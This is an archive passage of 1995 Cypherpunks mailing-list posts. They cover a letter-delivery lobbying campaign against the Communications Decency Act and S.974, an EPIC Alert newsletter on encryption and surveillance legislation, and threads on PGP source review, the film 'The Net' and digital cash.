for starting up an old thread again, but this isn't so much an invitation 
for discussion as it is a call to action.  I've updated it, since some 
things have changed since then.

-=Kathleen M. Ellis=-

---------- Forwarded message ----------
Date: Fri, 14 Jul 1995 04:11:23 -0400 (EDT)
From: K. M. Ellis <kelli@zeus.towson.edu>
To: "Timothy C. May" <tcmay@sensemedia.net>
Cc: pfarrell@netcom.com, jlasser@rwd.goucher.edu, cme@tis.com,
    cypherpunks@toad.com
Subject: Cypherpunks Lobbying?

On Thu, 13 Jul 1995, Timothy C. May wrote:

> 
> I'd hardly call my view "throwing in the towel." What I said clearly enough
> was that the Washingtonians can throw out repressive legislation much
> faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
> NRA, ACLU, etc., and _not_ the Cyherpunks, who have no lobbying activities
> to speak of.

I'm glad you brought this up, Tim, because Pat Farrell, Carl Ellison, and
I have been discussing the possiblility of doing just that over the past
week or so.  The three of us, in addition to many others (we like to call
ourselves "The Mid-Atlantic Cypherpunks") are very near DC and thought we
might take advantage of this on behalf of others who don't have the luxury
of living near their legislators. 

Our idea (and it was originally limited to lobbying against the CDA, but
we can expand it now to lobby against that and S.974) was to have Cypherpunks
send letters (yes, authentic _snail mail_) to a Cypherpunk willing to go
deliver it in person, (namely me) and talk to whoever is there, be it the
congressperson or one of his/her aides.  The strategy of this action would
be to say,"hello, we represent <insert your organization here> and we
oppose <insert appropriate legislation title here> and we feel this way
because <insert very reasonable and diplomatic explanations in easy,
mono-syllabic words so that the congresscritter can understand here> and
here is a letter from one of your constituents who feels the same way we
do."  A simple lobby. 

I thought this might be beneficial to cypherpunks because it seems that a
lot of representatives are difficult to get in touch with, since not all
of them have e-mail addresses.  I think there is a certain advantage in
this kind of action from an educational standpoint, considering that the
House doesn't seem to have a strong backer for this bill like the Senate
did, and the many Congresscritters who know nothing about the net only
need someone to explain the consequences of such a bill to them. 
Furthermore, to those ignorant of the net and its ways, a printed out list
of names and e-mail addresses collected through the web is completely
foreign and perhaps intimidating to them, and therefore not all that
helpful to us, IMHO.  Hand-signed letters (or hand-written, if your
printing is more legible than mine) in good, old-fashioned envelopes is
just what critters of this sort need to see. 

If any US citizens here would like me (and hopefully some older, wiser 
cypherpunks willing to join me on this trip) to deliver a letter to their 
congressperson please send a letter to this address:

                          The Hon. Whoever
                        c/o Kathleen M. Ellis
                           TSU box 898
                        Towson State University
                         8000 York Road
                          Towson, MD  21204

On the envelope you must include:

	The name of the congressperson (if I have to open the letter to be able 
			to tell who it is meant for it'll lose some of its 
			authenticity)

	My full address (yes, all five lines of it, or i'll never get it)

	If you can get it, the office location of representative 
			(building name and room number) printed on the 
			back. If you can't find it don't 
			worry, I'll find it, but if you can provide it I'd 
			appreciate it.  You can get it at the URL below.

	A return address

	A postmark from your district

The letter must have:

	The specific bill you are against; its number, title, and sponsors 
			(the CDA is H.R.1004/S.652 sponsored by 
			Senator James Exon, from Nebraska)

	Possible alternatives (my suggestion is H.R. 1978, sponsored by 
			Cox and Wyden)

	A polite introuduction, a concise body, and a gracious 
			conclusion :). 

	Your address and signature.

If you need more information for your letter, good URLs on the subject are:

http://www.cdt.org/cdw.html
http://www.cdt.org/petition.html
http://www.eff.org/pub/EFF/Issues/censorship/Exon_bill/
http://uvacs.cs.virginia.edu/~hwh6k/public/S314_stuff.html
http://www.phantom.com/~slowdog
http://www.panix.com/vtw/exon/

If you don't know who your representative is, try to find her/him through

http://www.house.gov

and look for a familiar looking name from your state.  Unfortunately 
there's no "point-and-click" US map to refer to to find out which 
district is yours, but you should be able to find out fairly easily by 
looking for familiar names.  If you really get stuck, try your local 
League of Women Voters.

The main thing is, I need these letters soon.  In order to have a shot at
getting to talk to anyone, I must make appointments with the offices of
the respective representatives.  The house is expected to vote on this
topic any day now; the clock's a-ticking.  I ask that all letters be sent
so that I can recieve them by August 11, 1995.  I aim to raid congress on
Wednesday, August 16.  This date could be changed, depending on the definite
responses I get from people willing to help. 

I have lobbied before, and I'm up to the task, but it would be nice to
have some other politically-oriented cypherpunks along for, at the very
least, moral support.  Anybody interested, Please Please Please send me
some e-mail.  Carl or Pat might go, and if we get enough people to help we 
can split the workload among teams.

If anyone has comments/questions/suggestions, don't hesitate.  I'd
appreciate whatever isn't necesary to go up on the list to be sent to me
privately, so's I don't get into trouble for "inciting spam". 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Wed, 2 Aug 95 17:10:32 PDT
To: "Interested People" <interest@epic.org>
Subject: EPIC Alert 2.08
Message-ID: <n1404728444.82181@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


     =============================================================
      
        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.08                                    August 2, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                       WWW http://epic.org


=======================================================================
Table of Contents
=======================================================================
  
 [1] Telecom Bill Update
 [2] New Bill Targets Crypto
 [3] 2600 FOIA Case on Appeal
 [4] National Security Surveillance Increases
 [5] New EPIC Reports Available
 [6] Upcoming Conferences and Events


=======================================================================
[1] Telecom Bill Reaches House Floor
=======================================================================

By the time you read this, the House of Representatives may or may not
have begun consideration of HR 1555, the so-called "telecommunications
reform" bill (the latest estimates are that consideration will begin
on the evening of August 2).  EPIC has joined with a coalition of
public interest organizations in calling for the defeat of this
legislation.  The coalition includes the Center for Media Education,
Computer Professionals for Social Responsibility, Consumer Federation
of America, Media Access Project, People for the American Way Action
Fund, and Taxpayer Assets Project/Consumer Project on Technology.  In
a joint statement issued on July 31, the coalition says of the
legislation:

     Specific provisions will directly affect the Internet.
     Users have been actively opposing one Senate provision
     to ban all "indecent" communications on computer networks.
     Given the overwhelming Senate support for that measure,
     there is substantial risk that any version of the
     telecommunications bill will contain content restrictions
     of some sort.

     Not only will any version of this legislation probably
     regulate content on the Internet, it will certainly
     eliminate many important economic safeguards against market
     power and abuse. The very competitive market that exists
     for Internet service providers should be emulated for phone
     and cable companies. Yet the legislation encourages greater
     monopoly control over all communications services.

Related developments:

* In a statement released on July 31, President Clinton announced his
intention to veto the current version of the telecommunications bill
pending in the House.  The White House statement noted that, "Instead
of promoting open access and diversity of content and viewpoints, [the
bill] would allow fewer people to control greater numbers of
television, radio and newspaper outlets in every community."

* The status of the "Communications Decency Act," which is included in
the telecommunications bill passed by the Senate, is unclear in the
House.  Although the so-called "Exon amendment" language is not
currently contained in the House legislation, it is anticipated that
advocates of Internet censorship will attempt to attach the CDA to the
telecom bill on the House floor.  For updated information, check the
Voters Telecommunications Watch (VTW) home page at
http://www.panix.com/vtw/exon/exon.html.

* The following materials are now available at the EPIC home page,
http://www.epic.org/telecom_bill/

     The full text of the public interest coalition statement,
     including an analysis of the legislation and Congressional
     contact information;

     The White House statement on the House legislation;

     The "managers' report" on the legislation, describing
     the current version of the bill;

     The latest version of the VTW alert on the Communications
     Decency Act Internet censorship provisions.


=======================================================================
[2] New Bill Would Outlaw Non-Escrowed Encryption
=======================================================================

On June 27, Sen. Charles Grassley (R-Iowa) introduced the
"Anti-Electronic Racketeering Act of 1995."  The legislation addresses
a broad array of Internet-related issues, including encryption.  Under
the heading of "Racketeering-related crimes involving computers," the
bill would, in effect, criminalize the distribution of all encryption
software over the Internet or other computer networks unless "the
software at issue used a universal decoding device or program that was
provided to the Department of Justice prior to the distribution."

Section 2(h)(1) of S.974 would amend Title 18 of the United States
Code to make it unlawful to:

     distribute computer software that encodes or encrypts
     electronic or digital communications to computer networks
     that the person distributing the software knows or
     reasonably should know, is accessible to foreign nationals
     and foreign governments, regardless of whether such software
     has been designated as nonexportable.

The legislation further provides that:

     [i]t shall be an affirmative defense to prosecution under
     this section that the software at issue used a universal
     decoding device or program that was provided to the
     Department of Justice prior to the distribution.

The legislation is plainly an attempt to mandate the result the
Administration sought to achieve with the failed Clipper Chip
initiative -- ensuring law enforcement access to *all* encrypted
communications through government-escrowed keys.  Requiring
"knowledge" of accessibility to foreign nationals or governments
provides no meaningful protection in a global communications
environment.  Such knowledge can easily be imputed to any person
making encryption software available on the Internet.

Criminalizing such distribution "regardless of whether such software
has been designated as nonexportable," would effectively outlaw the
dissemination of any encryption software that does not provide the
government with escrowed keys or some other backdoor.  As drafted, the
legislation would appear to prohibit the distribution of any program
that contains security features, including Netscape Navigator, various
digital cash applications and even PKZIP.

The Grassley bill was drafted with input from the Department of
Justice, suggesting that the Administration may be moving from the
initial "voluntary" Clipper approach toward mandatory restrictions on
the distribution and use of non-escrowed encryption.  Indeed, FBI
Director Louis Freeh has indicated on several occasions that domestic
uses of encryption will eventually be curtailed.  For instance, Freeh
said in Congressional testimony on May 11, 1995,

     ... we're in favor of strong encryption, robust encryption.
     The country needs it, industry needs it.  We just want to
     make sure we have a trap door and key under some judge's
     authority where we can get there if somebody is planning a
     crime.

The text of the "Anti-Electronic Racketeering Act" can be obtained at
http://www.epic.org/crypto/s974.txt.

EPIC will continue to monitor the progress of this legislation and
will be posting analyses of its other draconian provisions, including
those dealing with computer crime, distribution of copyrighted
material and searches and seizures of computer systems.


=======================================================================
[3] Appeals Court to Decide "2600" FOIA Case
=======================================================================

The wheels of justice turn slowly ...

In November 1992, a group of young people affiliated with the computer
magazine "2600" were confronted by mall security personnel, local
police officers and several unidentified individuals in the Pentagon
City shopping mall in Virginia.  The group members were ordered to
identify themselves and to submit to searches of their personal
property.  Their names were recorded and some of their property was
confiscated.

Computer Professionals for Social Responsibility (CPSR) filed suit in
federal court in early 1993 seeking the release of relevant Secret
Service records under the Freedom of Information Act.  The litigation
of the case is being handled by EPIC.

In July 1994, U.S. District Judge Louis Oberdorfer ordered the Secret
Service to release the vast majority of documents it maintains on the
incident. The government appealed that decision and the appeal is now
pending. In a recently filed brief, EPIC and CPSR argue that the
withheld documents demonstrate Secret Service misconduct and that the
FOIA exemptions cited by the agency do not apply.

The Pentagon City incident has been described as an example of
over-zealous law enforcement activities directed against so-called
computer "hackers."  The case raises significant issues of free speech
and assembly, privacy and government accountability.  Oral argument
before the U.S. Court of Appeals for the District of Columbia Circuit
is scheduled for September 14, 1995.  A copy of the CPSR/EPIC brief
can be found at:

      http://cpsr.org/cpsr/computer_crime/2600_brief_6_95.txt


=======================================================================
[4] Secret Court Surveillance Orders Increase, New Chief Judge Chosen
=======================================================================

According to Justice Department documents, orders for "national
security" electronic surveillance increased in 1994 over the previous
year.  576 orders for "national security" electronic surveillance were
approved in 1994, an increase of 65 orders over the previous year but
still lower than previous peak years of 1984 and 1991.

No requests for surveillance were denied or modified. Since its
inception in 1979, the Foreign Intelligence Surveillance Court (FISC)
has never turned down a request for an electronic surveillance order.

The secret court was created by the Foreign Intelligence Surveillance
Act of 1977.  Last year, the FISC's jurisdiction was expanded to
include authorizing physical searches of premises in "national
security" cases.

FISA Orders 1979-1994

1979 - 207    1980 - 322    1981 - 433    1982 - 475   
1983 - 549    1984 - 635    1985 - 587    1986 - 573   
1987 - 512    1988 - 534    1989 - 546    1990 - 595   
1991 - 593    1992 - 484    1993 - 509    1994 - 576

-------------

A new leader was recently named for the court.  U.S. District Court
Judge Royce C. Lamberth has been chosen to be the chief judge.
Lamberth replaces US District Court Judge Joyce Hens Green, whose term
expired earlier this year.  Members of the FISC are chosen by Chief
Justice William Rehnquist and serve seven year terms.

Lamberth was originally appointed to the U.S. District Court by
President Ronald Reagan in 1987.  Prior to his appointment, he was
Chief of the Civil Division of the U.S. Attorney's Office in
Washington, D.C. In 1993, he ruled against CPSR in its attempt to
obtain classified documents relating to the development of the Digital
Signature Standard.

Other court members are Wendell A. Miles, Western District of
Michigan; Ralph Thompson, Western District of Oklahoma; Charles
Schwartz, Eastern District of Louisiana; Earl H. Carroll, District of
Arizona; James C. Cacheris, Eastern District of Virginia; and John
Keenan, Southern District of New York.


=======================================================================
[5] Updated EPIC Reports Available
=======================================================================

EPIC has released updates of two of its reports:

EPIC Online Guide to Privacy Resources.  A comprehensive list of
privacy organizations, publications, newsgroups, mailing lists,
netsites and conferences related to privacy.  Updated August 1, 1995.
HTTP://www.epic.org/privacy/online_guide_faq.txt

Overview of 104th Congress - Electronic Privacy and Civil Liberties
Legislation.  A comprehensive listing of all legislation currently
pending in Congress that affects privacy and civil liberties.
Includes a brief overview, bill number, and status of each bill.
Updated August 1, 1995.
HTTP://www.epic.org/privacy/legislative_update.txt


=======================================================================
[6] Upcoming Privacy Related Conferences and Events
=======================================================================

DEF CON III. August 4-6, 1995. Las Vegas. Major hacker conference.
Contact: dtangent@defcon.org or http://dfw.net/~aleph1/defcon

Surveillance Expo '95. August 8-10. Mclean, Virginia. Sponsored by
Ross Engineering. Contact Jim Ross. 703-318-8600.

Advanced Surveillance Technologies. Sept. 4, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@privacy.org or HTTP://www.privacy.org/pi/conference/

17th International Conference of Data Protection and Privacy
Commissioners. September 6-8, 1995. Copenhagen, Denmark. Sponsored by
the Danish Data Protection Agency.  Contact Henrik Waaben, +45 33 14
38 44 (tel), +45 33 13 38 43 (fax).

InfoWarCon '95. September 7-8, 1995. Arlington, VA. Sponsored by NCSA
and OSS. Email: Winn@Infowar.Com.

"Managing the Privacy Revolution." Privacy & American Business. Oct.
31 - Nov. 1, 1995. Washington, DC.  Speakers include C.B. Rogers
(Equifax). Contact Alan Westin 201/996-1154.

11th Annual Computer Security Applications Conference: The conference
includes technical papers, panels, vendor presentations, and tutorials
that address the application of computer security and safety
technologies in the civil, defense, and commercial environments.
December 11-15, 1995, New Orleans, Louisiana. Contact Vince Reed at
(205)890-3323 or vreed@mitre.org.

1996 Computers, Freedom and Privacy Conference. March 27-30, 1996.
Cambridge MA. Sponsored by MIT.  Contact: cfp96-info@mit.edu or
http://web.mit.edu/cfp96.

               (Send calendar submissions to Alert@epic.org)


=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 301,
Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan..

Thank you for your support.

------------------------ END EPIC Alert 2.08 ------------------------



_________________________________________________________________________
Subject: EPIC Alert 2.08
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Freeman" <rfreeman@netaxs.com>
Date: Wed, 2 Aug 95 17:34:49 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
Message-ID: <199508030028.UAA11956@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Jul 95 at 20:49, Dr. Frederick B. Cohen wrote:

> 
> History shows that your approach fails. Here are some examples:
> 
>  Tens of thousands of people had source to the http daemon from
>  CERN, and yet none of them noticed a hole that was detected as
>  it was being exploited only a few months ago. 
> 
>  Tens of thousands of people have access to sendmail and yet
>  new holes are found by attackers several times per year on
>  average.
> 
>  Tens of thousands of people have access to the sources of
>  various versions of hundreds of software packages, yet there
>  are holes found every day.
> 

I don't think this is a very good analogy.  The problems that occur with these
programs don't really occur due to a fault the programs themselves so much as
in their interactions with other programs.  Unix is a very complex OS in the
regard that it allows for a lot of program interaction.  Same thing with
something like windoze - you don't see nearly as many program crashes in DOS
as in windoze, because in DOS only one program operates at a time, and it is
in an environment of the developer's choosing, rather than the user's.  I
personally only use pgp on my DOS machine - primarily because it is secure (or
at least reasonably so).  These wierd interactions are very hard to purposely
orchestrate and I doubt that they could be placed into a program which has
been ported into so many different OS's.  Try reading the source yourself.  It
is pretty well commented, and it doesn't fork or anything so there won't be
any kind of wierd in-program interactions.  I personally subscribe to the fact
that so long as there aren't any errors in the OS or compiler or machine
itself, then the source alone is enough to fully determine the operation of a
single-tasking program.  I don't pretend to understand the mathematics behind 
idea and RSA and all that (mostly because I haven't had time to read up on 
them), but it shouldn't be hard to verify that the program does in fact 
correctly execute the algorithm.
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 2 Aug 95 20:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <H2H99c9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@sensemedia.net (Timothy C. May) writes:
> I saw "The Net" yesterday and was moderately entertained. Lots of leaps of

I saw it about 1/2 hour ago. I make a point of seeing every computer-related
movie. I don't think real movie-goers would enjoy it much. It's cheap and
unprofessional. Lots of running around, but no real car crashes. The acting is
terrible. The star should NOT have appeared in a bikini. Yech.

> logic, especially the notion that one can be "vanished" by having computer
> records changed--I can believe that such changes would screw things up, but
> surely even the character played by Sandra Bullock (nicely) would have
> human friends and associates to vouch for her.

They try to "explain this away" by saying that 1) she lived in the neighborhood
for 4 years and never got to know any neighbors (as one of the neighbors tells
the police), 2) her mother's got Alzheimers and doesn't recognize her anymore,
3) she telecommutes for a company in another city and only knows 2 people there
in real life. One gets killed at the beginning; the other gets fired and she
makes no attempt to find him (one of the many loose ends). The computer-related
plot is just slightly more plausible.

(Movies about financial services, like _Wall St_ usually distort reality much
worse than movies about computers. Can you say "creative licence"?)

> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen.

Yes, everything is done on various PowerMacs, including playing Wolfenstein.
Could be X terminals. Except for a little Duo she gave her shrink/boyfriend,
and a powerbook she used at the beach. IMO, it's better than most such
scenes... It's way better than the scene in Wargames where the computer tries
to pick 10 digits of a password one by one... Not as good as Sneakers...

In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
office and sets off a fire alarm. Everyone leaves, including a villaine, who
doesn't log off. The heroine receives a new e-mail addressed to the villaine,
with the orders to kill the heroine (clearext), signed 'pretorian'. The heroine
types 'whois pretorian' and gets an IP address, but no name. The heroine goes
through what looks like traceroute and obtains the pretorian's name and picture
(but the viewers know his identity from the start, of course). She finishes
saving it to a floppy disk moments before the villaine returns to the cubicle.

(One of the IP bytes was 344, by the way.)

Another time she types "telnet someone@somewhere.mil". Another time she
"hot chats" on an her Mac, and hooks up the text to a voice synthesizer.

(If they all exchange so much e-mail, why do they bother FedExing diskettes?)

> If this was the film I advised a woman screenwriter/researcher about (the
> "vanishing" part she was asking me for tips on, 18 months ago), I sure

They may have been reading the Risks digest too much. :) One guy is apparently
flying his Cessna "by wire", thinks he's approaching the airport, actually hits
a smokestack. Another guy gets wrong medications, twice, and dies. All as
the result of the vilaines changing computer records, of course.

Interestingly, there's NO mention of crypto. Once you know someone's password,
or have physical access to the media, you can read and write everything. Once
you change some data, it's changed. No digital signatures. However, once the
virus melts the villaines' mainframe, their data is gone. No backups. And all
the changes they made in other systems are reversed. Reminded me of _The Wizard
of Oz_ a bit.

In fact, the bad guys were selling everyone a computer security system called
"the Gatekeeper" (a Trojan horse, really), but it's not identified as crypto.
It sounded like access rights are checked by their server. It involves a Web
page with a 'pi' symbol (pi stands for pretorian, of course). Clicking on the
pi while pressing control-shift will display much hexadecimal stuff and then
let the user in through a backdoor. Hmm. Gatekeeper = Bill Gates = Windows 95?
Is that why Apple lent those Macs? :)

There's a character named "CyberBob" who's never seen. He only hot-chats
and eventually gets killed. His icon looks like MS Bob.

I heard only one mention the "the Internet". At the end of the movie, a TV
announcer says that the case was cracked because the "programmer analyst
Angela Bennett e-mailed the evidence to the FBI from the Internet".
(E-mailed from an open-access computer at a computer show, I might add)

We were treated to 5 or 6 previews. One was for another movie called
"The Hackers", on the same topic, coming this summer. Some kids like to
break into systems. The bad guy blackmails someone, frames the kids.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 2 Aug 95 21:04:40 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: your mail
Message-ID: <8AE653E.00030002B9.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


AB> I suppose if I were really paranoid I'd feed in fixed starting points
AB> for the search to MIT PGP and PGP 2.6.2 to make sure that they come out
AB> with the same keys.

  Or use the non-MIT version to generate your keys, but let the MIT
version do your encryption. Nobody can tell where your key came from,
can they?


 * Come to Rosty's Bargain Basement, for a STEAL of a deal!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 2 Aug 95 21:04:34 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <8AE653E.00030002B8.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


MB> > an account that can be accessed over the net will be the day I close my US
MB> > accounts.
MB>
MB> Interesting idea ...
MB>
MB> 1st question or thing I would want to be certain of is the stability of the
MB> currency of the realm so to speak. I wouldn't want to bank in a country that
MB> had a weak currencey (sp) or was subject to roller coaster economics.

  Why would the currency of the country be relevant to the bank? There
is no reason why banks can not calculate balances in foreign currency. A
bank could even permit "vector balances" for accounts, such as:

                               <D, F, M, Y>

representing Dollars , (Swiss) Franks, Deutschmarks, and Yen,
respectively. One could even create a "synthetic currency" set to, say,
<.25, .4, .5, 30>, and all deposits and withdrawls would be converted
accordingly. This way, if one country blows things, you don't get hit
too hard.

  ObCrypto: Well... This will involve a bit more complicated arrangement
of finances, and add in the currency-conversion thing, so it will be
even more important to have standardized means of secure communications
with your offshore bank.


 * A Liberal puts your money where his mouth is.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 22:35:51 PDT
To: Nathan Zook <pjm@ionia.engr.sgi.com>
Subject: Re: NYET--attempted formal specs (again)
Message-ID: <ac45ab641b021004c902@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 8/2/95, Nathan Zook wrote:

...lots of other threads elided...

>Unquestionably, it is not possible to block this hole entirely.  However,
>that does not mean that this proposal is not still superior, at least on
>two points.
>
>First, by moving the monitoring software to the ISP, the instalation &
>configuration becomes much easier and more secure for the parent.  The
>monitoring software itself becomes at least as difficult to hack as the
>rest of unix, and the "Hot Babes Watch" hacks at least are prevented.

Knowing that Nathan is a member of the Religious Right (tm ), I think
enlisting their support for receiver-level filtering is a GOOD IDEA.

I happen to be a Nonbeliever--Allah forfend!--but I have no problems with
their beliefs.

In fact, most religious groups are distrustful of "The Gubment" deciding
what's reasonable and what's not.

The thing to do is to get the Mormons, the Baptists, the Muslims, the
Rosicrucians, the Davidians (those who survived the BATF action), and the
Breatharians, etc., to all agree that they need to "screen the evil out" on
_their_ side, not to get "The Gubment" to do it for them.

Orrin Hatch, a Mormon, has said that he grew up in Pennsylvania, and he
chafed under having to say the school prayers of the Dominant Religious
Paradigm. He has said that this makes him skeptical and critical of any
efforts to institute religion in classrooms.

I don't see any religion in America as being sufficiently dominant that it
thinks it can get its particular agenda accepted as the Dominant Religious
Paradigm. That is, they all seem suspicious of government involvement.

All to the good.

Thus, while not a Christian or even any kind of theist, I find much, much
less to fear from religious groups in the U.S. than I do from various
non-religious groups.

(Of course, if the Third Episcopal Transcendentalists succeed in taking
power, and begin "purifications" through crucifiction of non-Episcopals, I
may modify my charitable opinions...)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 2 Aug 95 22:53:58 PDT
To: cypherpunks@toad.com
Subject: Re: "The Net"
In-Reply-To: <9508030441.AA02714@gimli.cs.hope.edu>
Message-ID: <199508030553.WAA18286@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> hallyn@cs.hope.edu (Kenshiro) writes:
> [after all, what could beat the scene in Jurassic Park : "This is Unix. I 
> know this..." followed by what looks like a 3-d landing into zany-land.
> In slow motion. ]

Bad example -- it's a real interface to Unix for SGI machines, and you can
pick it up from their ftp site.  It made perfect sense for the girl (Lex?)
to be familiar with it...  I'm sure her doting grandfather (or whatever he
was) wouldn't have bought her a measly Sparcstation for her home computer.

	Jim Gillogly
	Highday, 11 Wedmath S.R. 1995, 05:53




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Wed, 2 Aug 95 09:30:29 PDT
To: cypherpunks@toad.com
Subject: Are there free implementations of DSS available?
Message-ID: <Pine.LNX.3.91.950802233833.1562B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for any pointer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallyn@cs.hope.edu (Kenshiro)
Date: Wed, 2 Aug 95 21:41:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <9508030441.AA02714@gimli.cs.hope.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote :
> I saw "The Net" yesterday and was moderately entertained. Lots of leaps of
...
> 
> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen. (But maybe I'm
> biased...)
As long as you realize it.
:)

[after all, what could beat the scene in Jurassic Park : "This is Unix. I 
 know this..." followed by what looks like a 3-d landing into zany-land.
 In slow motion. ]

-- Serue the SUNite

(hmm. so it's entertaining, mindless and devoid of reality? I'm there!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Wed, 2 Aug 95 11:25:12 PDT
To: cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <v02120d02ac44470c47f1@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8.2.95, Timothy C. May wrote:

>There is the "digital cash society" we fear as an Orwellian surveillance
>society, with all transactions recorded. This is perhaps the future
>Robertson fears.
>
>There is the "digital cash society" based on Chaumian schemes and
>untraceability, similar to a "hard cash" society without proofs of identity
>at every stage, and I suspect Robertson would find much to like about this.
>
>(There are also the implications which Robertson might recoil at, too. :-})
>
>So, hearing that "Pat Robertson is warning against a digital cash society"
>is not too worrisome to me. I suspect he means the stuff about Big Brother
>tracking us and the Number of the Beast, and so on.
>
>Don't forget he came out strongly against Clipper, early on.


And at 1:44 PM 8.2.95, Peter Trei wrote:

>The relevant verses are in Revelations 13, where some of the actions
>by which The Beast can be recognized are given. Among them are:
>
>16 And he causeth all, both small and great, rich and poor, free and
>   bond, to receive a mark in their right hand, or in their foreheads:
>17 And that no man might buy or sell, save he that had the mark, or
